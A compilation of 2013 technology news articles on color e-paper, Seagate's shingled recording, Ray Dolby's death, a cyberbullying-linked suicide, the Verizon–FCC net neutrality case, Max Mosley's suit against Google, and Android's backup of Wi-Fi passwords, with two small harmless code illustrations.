Amazon's recent Liquavista acquisition raises even more questions: if the iPad, Kindle Fire and Nook Color sealed the fate of color e-paper years ago, why did one of the industry's biggest e-reader manufacturers purchase a company known for low-power color displays? Reaching out directly for an answer proved futile for Engadget -- the company won't budge on the future of color e-paper or Amazon's intentions for the next-generation Kindle device.

Hushed acquisitions and quiet color-display advancements aren't enough to save color e-paper, however. More daunting than the display category's technological hurdles are the commercial roadblocks in its path: consumers are simply losing interest in the e-reader category as a whole. That certainly isn't to say that it's a dead or dying market, but it's slowly trending toward the niche. According to an IDC forecast released in March, e-reader shipments fell by a staggering 31 percent in a single year -- peaking at 26.4 million in 2011 and dropping to 18.2 million in 2012. At the same time, tablet sales have increased by about 11 percent, with about half of all devices sold falling into an e-reader-competitive form factor, measuring eight inches or smaller. Worse still, these numbers are for traditional monochrome e-readers, not the hopeful color models that failed to take flight.

The Kindle brand and its sunlight-readable e-paper display probably aren't going anywhere, but the category is edging away from the mainstream. Users demand more out of their devices these days, and slow-refreshing E Ink just can't cut it for a media tablet. If our predictions for the future need to be grounded in reality, then maybe it's time we finally put our color e-reader dreams to bed. The technology may eventually find a home somewhere, but at this rate, it likely won't be on our nightstand.
http://www.engadget.com/2013/09/05/t...color-e-paper/





Seagate's Shingled Magnetic Recording Tech Layers Tracks to Boost Bit Densities
Geoff Gasior

Since about 2006, hard drives have used perpendicular recording technology to store data. That method has enabled platter densities up to 1TB and drives as large as 4TB. Perpendicular recording is starting to bump into physical limits, though. Seagate says the read and write components of current technology can't get any smaller. Neither can the associated drive tracks, which are down to 75 nanometers in width.

According to the firm, a new approach is needed if areal densities are to continue their upward trajectory. That new approach is called Shingled Magnetic Recording, or SMR.

Shingled recording preserves the perpendicular bit orientation of its predecessor. However, it fundamentally changes the way in which those bits are organized. Instead of arranging individual tracks with space in between, shingled recording lays tracks on top of each other in a staggered fashion—much like the shingles on a roof.

As the diagram illustrates, the read head is much narrower than the write head. This size difference allows the tracks to overlap without affecting the drive's ability to read the data. The overlap poses a problem when data is rewritten, though. Because the write head covers the read portion of the next track, that data has to be "picked up" before the rewrite can occur. The displaced data then needs to be written back to its original location, displacing the data in the following track. And so on.

To prevent rewrites from cascading down too many tracks, Seagate arranges the tracks into bands. The precise layout of these bands will be different depending on the drive's target application. Increasing the number of tracks per band will raise the storage density, but it will also slow rewrite performance.
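
As a back-of-the-envelope illustration of that trade-off, the sketch below counts how many tracks a single in-place update touches in a shingled band. The function and the band sizes are invented for illustration and are unrelated to Seagate's actual firmware or geometry.

# Why band size is a density/performance knob in shingled recording:
# rewriting one track forces a read-modify-write of every later track in
# its band, since each write overlaps the track shingled on top of it.

def tracks_rewritten(tracks_per_band: int, index_in_band: int) -> int:
    """Tracks that must be picked up and written back to update one track."""
    return tracks_per_band - index_in_band

# Wider bands mean fewer band gaps (more density) but costlier worst-case
# rewrites (updating the first track of a band cascades to the whole band).
for band_size in (4, 16, 64):
    print(f"{band_size:2d}-track band: worst-case rewrite touches "
          f"{tracks_rewritten(band_size, 0)} tracks")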

Seagate says it's already shipping drives with SMR technology, though the first product isn't set to debut until next year. That drive promises a 25% increase in storage density: 1.25TB per platter and up to 5TB per drive.

SMR looks like a clever technology, and I'm eager to test the first drives based on it. That said, Seagate needs a better promo video. This short introduction has nothing on HGST's classic Get Perpendicular clip.

Seagate will also have to convince folks that SMR is worth the rewrite penalty. That might be an easier task than topping a disco-infused technology demonstration. SSDs have long since replaced mechanical drives as the go-to solution for high-performance PC storage, relegating HDDs to secondary and high-density storage. SMR's benefits may outweigh the penalty for those applications.
http://techreport.com/news/25334/sea...-bit-densities





Ray Dolby, Who Put Moviegoers in the Middle, Is Dead at 80
Natasha Singer

Ray Dolby, the sound pioneer who founded Dolby Laboratories, revolutionized the recording industry with the invention of the Dolby noise-reduction system, and transformed cinema and home entertainment with the development of Dolby digital surround sound, died on Thursday at his home in San Francisco. He was 80.

He developed Alzheimer’s disease several years ago and last July received a diagnosis of acute leukemia, according to a company statement.

Film industry executives credit Dr. Dolby with developing sophisticated technologies that enabled directors like Steven Spielberg to endow sound with the same emotional intensity as pictures. “In ‘Close Encounters of the Third Kind,’ the sound of the spaceship knocked the audience on its rear with the emotional content,” said Sidney Ganis, a film producer who is a former president of Paramount Pictures and a former president of the American Academy of Motion Picture Arts and Sciences. “That was created by the director, but provided by the technology that Ray Dolby invented.”

Over the course of Dr. Dolby’s career, the Dolby name became synonymous with high fidelity. For his pioneering contributions to audio engineering, Dr. Dolby received an Oscar, several Emmy Awards and a Grammy. He was also awarded the National Medal of Technology and Innovation by President Clinton and was appointed a Member of the Most Excellent Order of the British Empire by Queen Elizabeth II.

Trained in engineering and physics, Dr. Dolby started Dolby Laboratories in London in 1965 and soon after introduced technology that produced cleaner, crisper sound by electronically reducing the hiss generated by analog tape recording.

Decca Records was the first customer to buy the Dolby System. The noise-reduction technology quickly became a staple of major record labels.

By the 1970s, film studios began adopting the system as well. It was first used in 1971 in “A Clockwork Orange.” In the 1980s, the company introduced its digital surround sound technology into home entertainment.

Ray M. Dolby was born on Jan. 18, 1933, in Portland, Ore., the son of Earl Dolby, a salesman, and Esther Dolby. He was interested in how sound worked from a young age and took clarinet lessons.

As a teenager, he met Alexander Poniatoff, a Russian émigré and electrical engineer who had started an electronics company called Ampex that made tape recorders. Mr. Dolby worked at Ampex from 1949 to 1957 where, among other projects, he developed the electronic components of the company’s videotape recording system.

Mr. Dolby graduated from Stanford University in 1957 with a bachelor’s degree in electrical engineering. That year, he left Ampex to pursue graduate studies at Cambridge University in Britain on a Marshall Scholarship and a fellowship from the National Science Foundation. He received a doctorate in physics from Cambridge in 1961. While at Cambridge, he met a summer student named Dagmar Bäumert, whom he later married.

In 1963, Dr. Dolby traveled to India as an adviser for the United Nations, returning two years later to England where he founded Dolby Laboratories.

In 1976, he moved to San Francisco where the company still has its headquarters. The next year, the company gained wider renown after the release of “Star Wars” and “Close Encounters of the Third Kind,” which each used Dolby Stereo, a system for recording films in multichannel sound. In the 1980s, Dolby Labs introduced surround sound technology in television, compact discs, and laser discs.

Dr. Dolby served as chairman of the Dolby board from 1965 until 2009, retiring from the board in 2011. He is survived by his wife, Dagmar; two sons, Tom Dolby of Manhattan and David Dolby of San Francisco; and four grandchildren.

In 2012, in Dr. Dolby’s honor, the auditorium that is home to the Academy Awards, formerly known as the Kodak Theatre, was renamed the Dolby Theater.
http://www.nytimes.com/2013/09/13/bu...ead-at-80.html





Girl’s Suicide Points to Rise in Apps Used by Cyberbullies
Lizette Alvarez

The clues were buried in her bedroom. Before leaving for school on Monday morning, Rebecca Ann Sedwick had hidden her schoolbooks under a pile of clothes and left her cellphone behind, a rare lapse for a 12-year-old girl.

Inside her phone’s virtual world, she had changed her user name on Kik Messenger, a cellphone application, to “That Dead Girl” and delivered a message to two friends, saying goodbye forever. Then she climbed a platform at an abandoned cement plant near her home in the Central Florida city of Lakeland and leaped to the ground, the Polk County sheriff said.

In jumping, Rebecca became one of the youngest members of a growing list of children and teenagers apparently driven to suicide, at least in part, after being maligned, threatened and taunted online, mostly through a new collection of texting and photo-sharing cellphone applications. Her suicide raises new questions about the proliferation and popularity of these applications and Web sites among children and the ability of parents to keep up with their children’s online relationships.

For more than a year, Rebecca, pretty and smart, was cyberbullied by a coterie of 15 middle-school children who urged her to kill herself, her mother said. The Polk County sheriff’s office is investigating the role of cyberbullying in the suicide and considering filing charges against the middle-school students who apparently barraged Rebecca with hostile text messages. Florida passed a law this year making it easier to bring felony charges in online bullying cases.

Rebecca was “absolutely terrorized on social media,” Sheriff Grady Judd of Polk County said at a news conference this week.

Along with her grief, Rebecca’s mother, Tricia Norman, faces the frustration of wondering what else she could have done. She complained to school officials for several months about the bullying, and when little changed, she pulled Rebecca out of school. She closed down her daughter’s Facebook page and took her cellphone away. She changed her number. Rebecca was so distraught in December that she began to cut herself, so her mother had her hospitalized and got her counseling. As best she could, Ms. Norman said, she kept tabs on Rebecca’s social media footprint.

It all seemed to be working, she said. Rebecca appeared content at her new school as a seventh grader. She was gearing up to audition for chorus and was considering slipping into her cheerleading uniform once again. But unknown to her mother, Rebecca had recently signed on to new applications — ask.fm, Kik and Voxer — which kick-started the messaging and bullying anew.

“I had never even heard of them; I did go through her phone but didn’t even know,” said Ms. Norman, 42, who works in customer service. “I had no reason to even think that anything was going on. She was laughing and joking.”

Sheriff Judd said Rebecca had been using these messaging applications to send and receive texts and photographs. His office showed Ms. Norman the messages and photos, including one of Rebecca with razor blades on her arms and cuts on her body. The texts were full of hate, her mother said: “Why are you still alive?” “You’re ugly.”

One said, “Can u die please?” To which Rebecca responded, with a flash of resilience, “Nope but I can live.” Her family said the bullying began with a dispute over a boy Rebecca dated for a while. But Rebecca had stopped seeing him, they said.

Rebecca was not nearly as resilient as she was letting on. Not long before her death, she had clicked on questions online that explored suicide. “How many Advil do you have to take to die?”

In hindsight, Ms. Norman wonders whether Rebecca kept her distress from her family because she feared her mother might take away her cellphone again.

“Maybe she thought she could handle it on her own,” Ms. Norman said.

It is impossible to be certain what role the online abuse may have played in her death. But cyberbullying experts said cellphone messaging applications are proliferating so quickly that it is increasingly difficult for parents to keep pace with their children’s complex digital lives.

“It’s a whole new culture, and the thing is that as adults, we don’t know anything about it because it’s changing every single day,” said Denise Marzullo, the chief executive of Mental Health America of Northeast Florida in Jacksonville, who works with the schools there on bullying issues.

No sooner has a parent deciphered Facebook or Twitter or Instagram than his or her children have migrated to the latest frontier. “It’s all of these small ones where all this is happening,” Ms. Marzullo said.

In Britain, a number of suicides by young people have been linked to ask.fm, and online petitions have been started there and here to make the site more responsive to bullying. The company ultimately responded this year by introducing an easy-to-see button to report bullying and saying it would hire more moderators.

“You hear about this all the time,” Ms. Norman said of cyberbullying. “I never, ever thought it would happen to me or my daughter.”

Questions have also been raised about whether Rebecca’s old school, Crystal Lake Middle School, did enough last year to help stop the bullying; some of it, including pushing and hitting, took place on school grounds. The same students also appear to be involved in sending out the hate-filled online messages away from school, something schools can also address.

Nancy Woolcock, the assistant superintendent in charge of antibullying programs for Polk County Schools, said the school received one bullying complaint from Rebecca and her mother in December about traditional bullying, not cyberbullying. After law enforcement investigated, Rebecca’s class schedule was changed. Ms. Woolcock said the school also has an extensive antibullying campaign and takes reports seriously.

But Ms. Norman said the school should have done more. Officials told her that Rebecca would receive an escort as she switched classes, but that did not happen, she said.

Rebecca never boarded her school bus on Monday morning. She made her way to the abandoned Cemex plant about 10 minutes away from her modest mobile home; the plant was a place she had used as a getaway a few times when she wanted to vanish. Somehow, she got past the high chain-link fence topped with barbed wire, which is now a memorial, with teddy bears, candles and balloons. She climbed a tower and then jumped.

“Don’t ignore your kids,” Ms. Norman said, “even if they seem fine.”

Lance Speere contributed reporting from Lakeland, Fla., and Alan Blinder from Atlanta.
http://www.nytimes.com/2013/09/14/us...web-sites.html





Verizon and F.C.C. Net Neutrality Battle Set in District Court
Edward Wyatt

Few people would dispute that one of the biggest contributors to the extraordinary success of the Internet has been the ability of just about anyone to use it to offer any product, service or type of information he or she wants.

How to maintain that success, however, is the subject of a momentous fight that resumes this week in the United States Court of Appeals for the District of Columbia Circuit. The battle pits one of the largest providers of Internet access, Verizon, against the Federal Communications Commission, which for nearly 80 years has been riding herd on the companies that provide Americans with telecommunications services.

Verizon and a host of other companies that spent billions of dollars to build their Internet pipelines say they should be able to manage them as they wish. They should be able, for example, to charge fees to content providers who are willing to pay to have their data transported to customers through an express lane. That, the companies say, would allow the pipeline owner to reap the benefits of its investment.

The F.C.C., however, says that Internet service providers must keep their pipelines free and open, giving the creators of any type of legal content — movies, shopping sites, medical services or even pornography — an equal ability to reach consumers. If certain players are able to buy greater access to Internet users, regulators say, the playing field will tilt in the direction of the richest companies, possibly preventing the next Google or Facebook from getting off the ground.

The court is set to hear oral arguments starting Monday morning in Verizon v. F.C.C., which is billed as a heavyweight championship of the technology world, setting the old era against the new.

“This will determine whether the laws and regulations of the past, the pre-Internet age, will apply to the Internet’s future,” said Scott Cleland, the chairman of NetCompetition, a group sponsored by broadband companies, including Verizon. “It will determine the regulatory power and authority of the F.C.C. in the 21st century.”

Susan Crawford, a supporter of the F.C.C.’s position who is co-director of the Berkman Center for Internet and Society at Harvard and a professor at Yeshiva University’s Cardozo School of Law, called the showdown “a moment of grandeur.”

“The question presented by the case is does the U.S. government have any role to play when it comes to ensuring ubiquitous, open, world-class, interconnected, reasonably priced Internet access?” Ms. Crawford said. “Does the government have good reason to ensure that facility in America?”

European countries are similarly struggling with whether and how to regulate Internet service. The Netherlands has some wireless regulations in place, and France this year introduced strict anti-discrimination measures. But while European Union officials have expressed support for what is known as net neutrality, a recent proposal gives Internet providers more leeway to manage services than many neutrality supporters liked.

In December 2010, the F.C.C. issued its “Open Internet Order,” an 87-page set of instructions directing Internet service providers not to block or to unreasonably discriminate against any type of Internet traffic deemed not harmful to the system. The only exception to the open access principle is for “reasonable network management,” a loosely defined term that allows a company to do what it takes to keep its network up and running.

Internet service providers were also ordered to disclose how they manage their networks and how their systems perform — like how they handle congestion when a large portion of users are, for example, downloading high-definition video.

The order was necessary, the F.C.C. said in court papers, because “there were significant threats to openness, and thus to the engine that has driven investment in broadband facilities.” In the past, the F.C.C. said, “several broadband access providers had blocked or degraded service.” One was Comcast, which in 2008 was punished by the F.C.C. for blocking access by some of its users to the file-sharing service BitTorrent, which was often used for the unauthorized exchange of movies or music.

“Other providers have the technological capability and the economic incentive to engage in similar acts,” the commission said. “And with the majority of Americans having only two wireline broadband choices (many have only one), market discipline alone could not guarantee continued openness.” The F.C.C.’s rules generally are less strict for wireless carriers, because those networks are more susceptible to congestion.

In the Comcast case, the cable company appealed the F.C.C. ruling, and the Washington federal appeals court — the same court hearing the Verizon case — said in 2010 that the agency had overstepped its bounds, failing to show that it had the authority to regulate an Internet service provider.

It is, in fact, far from easy for the F.C.C. to demonstrate that it has such authority. That is because in 2002, the commission, then led by Michael K. Powell, a Republican, voted to classify Internet service as an information service rather than a telecommunications service.

The difference meant that Internet providers were not subject to regulation like a telephone company. Instead, they were free of restrictions on rates and exempt from regulations that would require them to open their networks to allow competitors to offer lower-cost service over the same pipes.

The judge who wrote the Comcast decision, David S. Tatel, is one member of the three-judge panel that will hear Verizon’s appeal. Many industry experts view the two other judges as highly likely to take opposing sides, leaving Judge Tatel as the swing vote.

Verizon argues that the F.C.C.’s Open Internet Order should be struck down because it is arbitrary and capricious, and aims to prevent activity that is not taking place. It argues in its court filings that the commission has documented only four examples, over six years, of purported blocking of Internet content by service providers.

During those six years, the company said, “end users successfully accessed the Internet content, applications and services of their choice literally billions of times.”

More broadly, Verizon argues that the F.C.C., as in the Comcast case, “fails to identify any statutory authority for the rules.” And in fact, Verizon said, the F.C.C. order is so broad that it would give the commission the power “to regulate all sectors of the Internet economy without limit.”

The court is likely to take several months to issue its decision, lawyers involved in the case say — perhaps before the end of the year, but more likely in 2014. When the ruling comes, many people will be waiting. More than 400 organizations or individuals weighed in at the F.C.C. when the rules were being considered. More than 60 signed legal briefs supporting the commission, while at least a dozen did so backing Verizon.
http://www.nytimes.com/2013/09/09/bu...ict-court.html





Judges Hear Arguments on Rules for Internet
Edward Wyatt

In a momentous battle over whether the Web should remain free and open, members of a federal appeals court expressed doubt over a government requirement that Internet service providers treat all traffic equally.

On Monday, the Federal Communications Commission and Verizon, one of the largest Internet service providers, squared off in a two-hour session of oral arguments — three times as long as was scheduled. As Verizon pushed for the authority to manage its own pipes, the government argued that creators of legal content should have equal access to Internet users, lest big players gain an unfair advantage.

But two judges appeared deeply skeptical that the F.C.C. had the authority to regulate the Internet in that manner.

The two jurists, Judge Laurence H. Silberman and Judge David S. Tatel, said that the agency’s anti-discrimination rule — which requires an Internet service provider to give all traffic that travels through its pipes the same priority — illegally imposed rules meant for telephones on the infrastructure of the Web. The F.C.C. itself disallowed the telephone-type regulation a decade ago.

The third judge, Judith W. Rogers, did not ask as many questions but appeared to accept much of the F.C.C.’s position.

Consumers could experience a significant change in the Internet if the United States Court of Appeals for the District of Columbia Circuit strikes down the F.C.C.’s requirement, called the Open Internet Order.

Currently, companies that offer goods or services online do not have to pay anything to get their content to consumers. If Internet service providers started charging fees to reach customers more quickly, large, wealthy companies like Google and Facebook would have an edge, the F.C.C. says. The government argued that such a tiered service could cause small, start-up companies with little money to pay for their access — the next Google or Facebook, perhaps — to wither on the vine.

In any case, the added costs would likely be passed on to consumers.

The case, which is expected to be decided late this year or early next year, has attracted enormous interest. On Monday, telecommunications lawyers began lining up to get into the courtroom two and a half hours before the session was scheduled to start. The session was standing room only, with many others left to listen in an adjacent overflow room.

The judges were not entirely hostile to the F.C.C.’s arguments. Judge Tatel, who many telecommunications analysts expect to be the swing vote on the case, pushed lawyers on both sides to concede that the part of the F.C.C. rule that prohibits outright blocking of online content or applications could be allowed.

Judge Tatel also queried each side on whether the two main provisions of the Open Internet Order — no blocking and no discrimination — had to be taken as a whole or could be separated, with the no-blocking rule being upheld.

An opinion that voided one provision yet upheld the other would be more likely to be appealed to the Supreme Court, telecommunications lawyers said, because neither side would be completely happy with the decision.

Helgi C. Walker of the law firm Wiley Rein, who argued the case on behalf of Verizon, said the rules had to be struck down as a whole. Congress never intended the F.C.C. to have authority to regulate the Internet, she said.

Sean A. Lev, who argued the case for the agency, told the judges that the F.C.C. did have the authority to govern the Internet under numerous parts of the Telecommunications Act, including one that gives the commission the duty to work to expand broadband access. Companies that have equal access to consumers are encouraged to innovate, Mr. Lev said, adding that it would result in more vibrant start-ups and a growth in demand for Internet service.

The judges themselves seemed intent on viewing the case from as many sides as possible. Each side was allotted 20 minutes to present its case and answer questions from the judges. But after spending 30 minutes on Verizon’s presentation, the judges proceeded to grill the F.C.C.’s lawyer for a full hour.

The remainder of the two-hour session was spent hearing from a lawyer representing public-interest groups, who joined the lawsuit on the F.C.C.’s side, and a rebuttal from Verizon.

The F.C.C.’s uphill battle, in part, reflects politics and past decisions by the agency. In 2002, its chairman at the time, Michael K. Powell, a Republican, got the majority of the commission to agree that the Internet was not a telecommunications service like the telephone system. Instead, it classified the Web as an information service, making it subject to much lighter regulation.
http://www.nytimes.com/2013/09/10/te...-internet.html





Verizon's Diabolical Plan to Turn the Web into Pay-Per-View
Bill Snyder

Think of all the things that tick you off about cable TV. Along with brainless programming and crummy customer service, the very worst aspect of it is forced bundling. You can't pay just for the couple of dozen channels you actually watch. Instead, you have to pay for a couple of hundred channels, because the good stuff is scattered among a number of overstuffed packages.

Now, imagine that the Internet worked that way. You'd hate it, of course. But that's the direction that Verizon, with the support of many wired and wireless carriers, would like to push the Web. That's not hypothetical. The country's No. 1 carrier is fighting in court [1] to end the Federal Communications Commission's policy of Net neutrality, a move that would open the gates to a whole new -- and wholly bad -- economic model on the Web.

As it stands now, you pay your Internet service provider and go wherever you want on the Web. Packets of bits are just packets and have to be treated equally. That's the essence of Net neutrality. But Verizon's plan, which the company has outlined during hearings in federal court and before Congress, would change that. Verizon and its allies would like to charge websites that carry popular content for the privilege of moving their packets to your connected device. Again, that's not hypothetical.

ESPN, for example, is in negotiations [4] with at least one major cellular carrier to pay to exempt its content from subscribers' cellular data caps. And what's wrong with that? Well, ESPN is big and rich and can pay for that exemption, but other content providers -- think of your local jazz station that streams audio -- couldn't afford it and would be out of business. Or, they'd make you pay to visit their websites. Indeed, if that system had been in place 10 years ago, fledglings like Google or YouTube or Facebook might never have gotten out of the nest.

Susan Crawford, a tech policy expert and professor at Yeshiva University's Benjamin N. Cardozo School of Law, says Verizon wants to "cable-ize the Internet." She writes in her blog [5] that "The question presented by the case is: Does the U.S. government have any role in ensuring ubiquitous, open, world-class, interconnected, reasonably priced Internet access?"

Verizon and other carriers answer that question by saying no.

They argue that because they spent megabucks to build and maintain the network, they should be able to have a say over what content travels over it. They say that because Google and Facebook and other Internet companies make money by moving traffic over "their" networks, they should get a bigger piece of the action. (Never mind that pretty much every person and business that accesses Google or Facebook is already paying for the privilege, and paying more while getting less speed than users in most of Europe.)

In 2005, AT&T CEO Ed Whitacre famously remarked [6] that upstarts like Google would like to "use my pipes free, but I ain't going to let them do that because we have spent this capital and we have to have a return on it."

That's bad enough, but Verizon goes even further. It claims that it has a right to free speech and, like a newspaper that may or may not publish a story about something, it can choose which content it chooses to carry. "Broadband providers possess 'editorial discretion.' Just as a newspaper is entitled to decide which content to publish and where, broadband providers may feature some content over others," Verizon's lawyers argue in a brief (PDF) [7].

That's so crazy I won't bother to address it. But the FCC has done such a poor job of spelling out what it thinks it has the right to regulate and how that should work that the door is wide open for the carriers' bizarre -- not to mention anticonsumer -- strategies and arguments.

I don't want to get down in the regulatory weeds, but there is one bit of legalese that's worth knowing: common carrier. Simply put, it means that the company doing the shipping can't mess with the contents. A railroad is a common carrier, and as such it can't decide whose cargo it will carry and whose it won't.

Before railroads were common carriers, they did things like favor products made by John D. Rockefeller's Standard Oil, which made him even richer and also led to the creation of a wildly out-of-control monopoly. (Yeshiva's Crawford has an in-depth but readable explanation of these issues in her book "Captive Audience: The Telecom Industry and Monopoly Power in the New Gilded Age" [8].)

But the FCC has never ruled that ISPs are common carriers, partly because it's afraid of the power of the lobbyists to influence Congress and partly because its commissioners lack spine. And now that lack of spine is about to bite the butt of everyone who uses the Web.

According to people who follow this stuff closely, because ISPs are not common carriers the judges on the U.S. Court of Appeals in Washington, D.C., are looking askance at the FCC's defense against Verizon's lawsuit, although a verdict isn't likely for months.

Here are the stakes: "If Verizon -- or any ISP -- can go to a website and demand extra money just to reach Verizon subscribers, the fundamental fairness of competing on the Internet would be disrupted. It would immediately make Verizon the gatekeeper to what would and would not succeed online. ISPs -- not users, not the market -- would decide which websites and services succeed," writes Michael Weinberg, vice president of Public Knowledge, a digital advocacy group.

A taste of the Web's future: The Time Warner vs. CBS dustup
You don't have to wait for the Verizon verdict to get a taste of what the New Web Order would be like. Time Warner Cable and CBS just had a dustup over how much Time Warner would pay CBS to carry its programming. When the pair couldn't agree, the cable giant stopped carrying CBS programming in New York City, Los Angeles, and Dallas. CBS then retaliated by stopping Time Warner subscribers from streaming its programming over the Internet.

They settled after about a month. Staying true to form, Time Warner refused to give customers a rebate as compensation for lost programming.

That's not exactly the same issue that we're facing in the fight over Net neutrality, but it should give you a sense of what life is like when the giants fight it out over what you're allowed to access and for how much. Users get caught in the middle, and the rights we've taken for granted simply disappear.
http://www.infoworld.com/d/the-indus...ay-view-226662





Google in Fight Over Content That Appears in Search Results
David Jolly

Max Mosley, the former president of the International Automobile Federation, might be forgiven for wanting Google to filter certain search results.

Mr. Mosley was the victim of a spectacular 2008 sting by News of the World — Rupert Murdoch’s disgraced, and now defunct, tabloid weekly — which posted photos and video of him participating in a sadomasochistic sex party that the paper described as “a sick Nazi orgy with hookers.”

The Nazi claim, in particular, was a bitter one; the son of Sir Oswald Mosley, a World War II-era British fascist, Mr. Mosley has long bristled at the suggestion of Nazi sympathies. He sued News of the World in a London court for breach of privacy and was awarded £60,000, or about $94,000, in damages.

The High Court ruled that there was “no evidence” that the sex party had been “intended to be an enactment of Nazi behavior or adoption of any of its attitudes.” It also found that there had been “no public interest or other justification for the clandestine recording.”

The court ordered News of the World to remove the material in question from the Web, naturally, and there the story might have ended. Except, of course, that the photos and video continue to live on the Internet, via social media and on Web sites maintained by individuals. Mr. Mosley has been fighting ever since to make them disappear.

And that is where Google comes in: Mr. Mosley asked a Paris court during the past week to order the Internet giant to create an algorithm to filter all such photos from its service and search engine, now and forever. His lawyer told the court, the Tribunal de Grande Instance, that if Google France refused to remove the offending images it should face fines.

The French court said it would issue a ruling on Oct. 21. Mr. Mosley has filed a similar case in Hamburg that is to be heard this month.

Google strongly disputes any responsibility.

“We sympathize with Mr. Mosley’s situation,” Google said in a statement, noting that it had always honored his requests to remove obviously incriminating links. “But his proposal to filter the Web would censor legitimate speech, restrict access to information, and stifle innovation.”

The company noted that there was already a solution to the problem: “Going after the actual publishers of the material, and working with Google through our existing and effective removals process.”

Google says that it has already taken down “hundreds of pages” with images that obviously infringe on the court ruling when it is requested to do so, but that there are many cases in which it is not immediately clear whether the content is affected by the ruling, and that in those cases a judge or other competent official should make the decision.

It cites French and E.U. law, which do not require search engines to comb the Web for unlawful content, and it argues that, in any case, many of the hits the photos receive are driven by communications among individuals, so blocking them on search would not end the problem.

A concurrent case, at the European level, would appear to back Google. The European Court of Justice, which is based in Luxembourg, is currently examining a Spanish man’s claim of a “right to be forgotten” on the Web — something Silicon Valley companies oppose.

In a sign that the case might be swinging the technology giants’ way, Niilo Jaaskinen, the Finnish lawyer who serves as advocate general of the court, issued an opinion in June that search engines were not responsible “for personal data appearing on Web pages they process.”

E.U. data protection law “does not entitle a person to restrict or terminate dissemination of personal data that he considers to be harmful or contrary to his interests,” Mr. Jaaskinen wrote. Though the court is not bound by the advocate general’s opinion, it often follows his recommendations. It has yet to decide the matter.

Why would Mr. Mosley seek action against an American company in a French court for actions committed in Britain by a now-defunct English newspaper? It might have to do with France’s strict privacy laws, which make it a criminal offense to record another person — image or sound — in a private space without the person’s consent.

His lawyer, Clara S. Zerbib, said that it was because a Paris court had ruled in 2011 that the recording of the News of the World pictures, without Mr. Mosley’s knowledge in a private place, had been illegal and that a judge might thus find that distributing such pictures on the Internet was also illegal. She noted that Mr. Mosley also worked in France as president of the International Automobile Federation, the Paris-based governing body of Formula One racing, and was concerned about his reputation there.

Mr. Mosley, in a telephone interview, said that Google had been helpful, if not always swift, in answering his requests to remove photos but that he should not have to constantly ask them to do so, since the court ruling had made plain that they were illicit.

“We shouldn’t have to keep asking them every time these photos come up,” Mr. Mosley said. “You have to employ someone to look every day. They shouldn’t put them up in the first place.”

He acknowledged that by fighting Google in court, he was inevitably attracting additional attention, but that he had to do it, because “anybody who’s interested in me will Google me, and the first thing they see are these photos.”

Mr. Mosley and his legal team say there do not appear to be any technical barriers to Google’s doing what he is asking. Google, working to address British concerns about child pornography on the Web, said in June that it had the capacity to identify and block images automatically, using “hashing” technology.
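
Google has not published how that image "hashing" works, and production systems are reported to rely on perceptual hashes that survive re-encoding rather than exact file hashes. Purely as a rough illustration of hash-based blocking, a minimal Python sketch against a hypothetical blocklist might look like this (the digest below is a placeholder, not real data):

    import hashlib

    # Hypothetical blocklist of SHA-256 digests of known unlawful images,
    # supplied out of band; the value below is a placeholder only.
    BLOCKED_HASHES = {
        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
    }

    def is_blocked(image_bytes: bytes) -> bool:
        # Exact-match check: changing a single byte of the file defeats it,
        # which is why real systems favor perceptual hashing instead.
        return hashlib.sha256(image_bytes).hexdigest() in BLOCKED_HASHES

    print(is_blocked(b"stand-in for image bytes"))  # False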

“If you have any respect for the rule of law, and it’s been decided by the court that it’s illegal, then you shouldn’t reproduce them,” he said.

But Google is adamant that the automatic filter Mr. Mosley is demanding would be a blunt tool that would indiscriminately eliminate both lawful and unlawful content, including perhaps reporting on Mr. Mosley’s own case.

“We hope that the French court will not order us to build a censorship machine,” the company said.
http://www.nytimes.com/2013/09/09/te...h-results.html





Google Knows Nearly Every Wi-Fi Password in the World
Michael Horowitz

If an Android device (phone or tablet) has ever logged on to a particular Wi-Fi network, then Google probably knows the Wi-Fi password. Considering how many Android devices there are, it is likely that Google can access most Wi-Fi passwords worldwide.

Recently IDC reported [1] that 187 million Android phones were shipped in the second quarter of this year. That multiplies out to 748 million phones [2] in 2013, a figure that does not include Android tablets.

Many (probably most) of these Android phones and tablets are phoning home to Google, backing up Wi-Fi passwords along with other assorted settings. And, although they have never said so directly, it is obvious that Google can read the passwords.

Sounds like a James Bond movie.

Android devices have defaulted to coughing up Wi-Fi passwords since version 2.2. And, since the feature is presented as a good thing, most people wouldn't change it. I suspect that many Android users have never even seen the configuration option controlling this. After all, there are dozens and dozens of system settings to configure.

And, anyone who does run across the setting cannot hope to understand the privacy implication. I certainly did not.

Specifically:
In Android 2.3.4, go to Settings, then Privacy. On an HTC device, the option that gives Google your Wi-Fi password is "Back up my settings". On a Samsung device, the option is called "Back up my data". The only description is "Back up current settings and application data". No mention is made of Wi-Fi passwords.
In Android 4.2, go to Settings, then "Backup and reset". The option is called "Back up my data". The description says "Back up application data, Wi-Fi passwords, and other settings to Google servers".

Needless to say "settings" and "application data" are vague terms. A longer explanation of this backup feature in Android 2.3.4 can be found in the Users Guide [3] on page 374:

Check to back up some of your personal data to Google servers, with your Google Account. If you replace your phone, you can restore the data you’ve backed up, the first time you sign in with your Google Account. If you check this option, a wide variety of your personal data is backed up, including your Wi-Fi passwords, Browser bookmarks, a list of the applications you’ve installed, the words you’ve added to the dictionary used by the onscreen keyboard, and most of the settings that you configure with the Settings application. Some third-party applications may also take advantage of this feature, so you can restore your data if you reinstall an application. If you uncheck this option, you stop backing up your data to your account, and any existing backups are deleted from Google servers.

A longer explanation for Android 4.0 can be found on page 97 of the Galaxy Nexus phone Users Guide [4]:

If you check this option, a wide variety of your personal data is backed up automatically, including your Wi-Fi passwords, Browser bookmarks, a list of the apps you've installed from the Market app, the words you've added to the dictionary used by the onscreen keyboard, and most of your customized settings. Some third-party apps may also take advantage of this feature, so you can restore your data if you reinstall an app. If you uncheck this option, your data stops getting backed up, and any existing backups are deleted from Google servers.

Sounds great. Backing up your data/settings makes moving to a new Android device much easier. It lets Google configure your new Android device very much like your old one.

What is not said, is that Google can read the Wi-Fi passwords.

And, if you are reading this and thinking about one Wi-Fi network, be aware that Android devices remember the passwords to every Wi-Fi network they have logged on to. The Register writes [5]

The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user's home, and include hotels, shops, libraries, friends' houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents.

The good news is that Android owners can opt out just by turning off the checkbox.

